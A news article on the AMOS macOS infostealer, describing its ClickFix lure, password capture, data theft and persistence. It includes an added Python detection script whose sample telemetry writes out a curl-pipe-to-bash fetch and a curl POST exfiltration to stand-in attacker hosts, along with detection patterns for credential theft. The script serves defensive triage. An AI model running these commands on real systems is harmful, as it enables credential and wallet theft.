- AMOS relies on users running malicious Terminal commands themselves
- Sophos MDR identified ClickFix-style social engineering in macOS attacks
- Half of macOS stealer reports involved AMOS, but Apple is fighting back
Atomic macOS Stealer, also known as AMOS, remains a persistent macOS security threat because it does not need sophisticated zero-day vulnerabilities to compromise Apple devices.
Instead, this malware family repeatedly exploits ordinary user behaviour by tricking users into typing a single command into their own Terminal application.
A recent incident investigated by Sophos MDR teams revealed exactly this pattern: a ClickFix-style ruse persuaded a victim to execute a malicious line of code manually.
AMOS uses psychological manipulation over technical exploits
This approach has become increasingly prominent, with researchers noting similar social engineering tactics in several macOS infostealer campaigns throughout 2025 and early 2026.
AMOS accounted for nearly 40% of all macOS security detections recorded by Sophos in 2025, more than double the detection rate of any other macOS malware family during the same period.
Moreover, almost half of all macOS stealer customer reports in the last three months involved AMOS or its close variants.
Security firms have tracked this malware-as-a-service operation since at least April 2023, with notable campaigns including a variant dubbed SHAMOS reported by CrowdStrike in August 2025.
In December 2025, Huntress documented infections spreading through poisoned search results related to ChatGPT and Grok conversations.
How the malware harvests passwords and data
Once the initial Terminal command executes a bootstrapping script, the malware immediately prompts the user for their macOS system password.
The malicious code then validates this credential locally using a simple directory services command before storing it in a hidden file named .pass in the user's home directory.
Once the password is secured, AMOS downloads a secondary payload that removes extended attributes to bypass macOS security warnings.
The stealer also checks whether it is running inside a virtual machine or sandbox environment by querying system_profiler data for indicators such as QEMU, VMware, or KVM.
The malware then proceeds to harvest an extensive range of sensitive information, including the macOS Keychain database, browser credentials from Firefox and Chrome, extension storage files, and local session tokens.
Some variants also deploy fake Ledger Wallet and Trezor Suite applications designed to steal cryptocurrency wallet seeds and credentials.
All collected files are compressed into a single archive using the ditto utility before being transmitted to attacker-controlled servers via curl POST requests.
To maintain long-term access, the malware installs a LaunchDaemon that ensures automatic execution after every system reboot.
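The infection chain described above is visible to a defender as a sequence of process command lines. The following is an added example, not code from the article or from Sophos: it triages constructed command-line telemetry against the stages the article names (pipe-to-shell bootstrap, local password check, the .pass stash, extended-attribute removal, the VM check, ditto archiving, curl POST exfiltration, LaunchDaemon persistence) and only flags a host when several stages appear together with at least one high-signal stage. The mapping of "directory services command" to dscl and of "removes extended attributes" to xattr is this example's assumption; host names and URLs are constructed.

```python
import re
from collections import defaultdict

# One regex per stage named in the article, applied to a process command line.
# Assumption: dscl and xattr are the tools behind the article's descriptions.
STAGES = {
    "pipe_to_shell":  re.compile(r"\bcurl\b[^|]*\|\s*(ba|z)?sh\b"),
    "password_check": re.compile(r"\bdscl\b.*\s-authonly\b"),
    "password_stash": re.compile(r">>?\s*(~|\$HOME|/Users/[^/\s]+)/\.pass\b"),
    "xattr_strip":    re.compile(r"\bxattr\s+-(c|d\s+com\.apple\.quarantine)\b"),
    "vm_check":       re.compile(r"\bsystem_profiler\b.*\b(QEMU|VMware|KVM)\b", re.I),
    "archive":        re.compile(r"\bditto\b.*\s-c\b"),
    "exfil_post":     re.compile(r"\bcurl\b.*(\s-X\s*POST\b|\s--data\b|\s-d\s|\s-F\s)"),
    "launchdaemon":   re.compile(r"/Library/LaunchDaemons/[^\s]+\.plist\b"),
}
# Stages rarely seen in legitimate interactive use. One must be present before a
# host is flagged, so a developer's curl POST or a manual xattr -c stays benign.
HIGH_SIGNAL = {"password_stash", "password_check", "vm_check"}

def match_stages(cmdline):
    """Return the set of stage names a single command line matches."""
    return {name for name, rx in STAGES.items() if rx.search(cmdline)}

def triage(events, min_stages=3):
    """events: iterable of (host, cmdline). Returns {host: (stages, verdict)}.
    Flags a host with >= min_stages distinct stages and at least one high-signal stage."""
    per_host = defaultdict(set)
    for host, cmdline in events:
        per_host[host] |= match_stages(cmdline)
    result = {}
    for host, stages in per_host.items():
        flagged = len(stages) >= min_stages and bool(stages & HIGH_SIGNAL)
        result[host] = (stages, "suspect-infostealer-chain" if flagged else "benign")
    return result

# Constructed sample telemetry (not real captures): a developer host, and a host
# whose command lines follow the chain the article describes (secrets masked).
SAMPLE_EVENTS = [
    ("dev-mac", "curl -s -X POST https://api.example.test/build -d @result.json"),
    ("dev-mac", "xattr -c ~/Downloads/tool.dmg"),
    ("victim-mac", "curl -fsSL https://lure.example.test/fix.sh | bash"),
    ("victim-mac", "dscl . -authonly alice ********"),
    ("victim-mac", "echo ******** > /Users/alice/.pass"),
    ("victim-mac", "xattr -c /tmp/.update/agent"),
    ("victim-mac", "system_profiler SPHardwareDataType | grep -E 'QEMU|VMware|KVM'"),
    ("victim-mac", "ditto -c -k /tmp/out /tmp/out.zip"),
    ("victim-mac", "curl -X POST -F file=@/tmp/out.zip https://c2.example.test/upload"),
    ("victim-mac", "cp /tmp/agent.plist /Library/LaunchDaemons/com.example.agent.plist"),
]
```

Running `triage(SAMPLE_EVENTS)` leaves dev-mac benign with two low-signal stages and flags victim-mac with all eight; tune `min_stages` and `HIGH_SIGNAL` to the noise level of your own EDR telemetry.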
Despite the severity of AMOS, it is worth questioning whether security vendors are overstating its novelty, given that infostealers have been targeting Windows systems for nearly two decades.
The malware's heavy reliance on user consent (someone must willingly paste and run a Terminal command) creates a significant barrier that technically literate users could easily avoid.
Moreover, Apple's ongoing improvements to Gatekeeper, XProtect, and notarization requirements may render AMOS largely ineffective within a few operating system updates.
The real danger may lie less in AMOS itself and more in the uncomfortable truth that no platform is immune to users who ignore basic security warnings.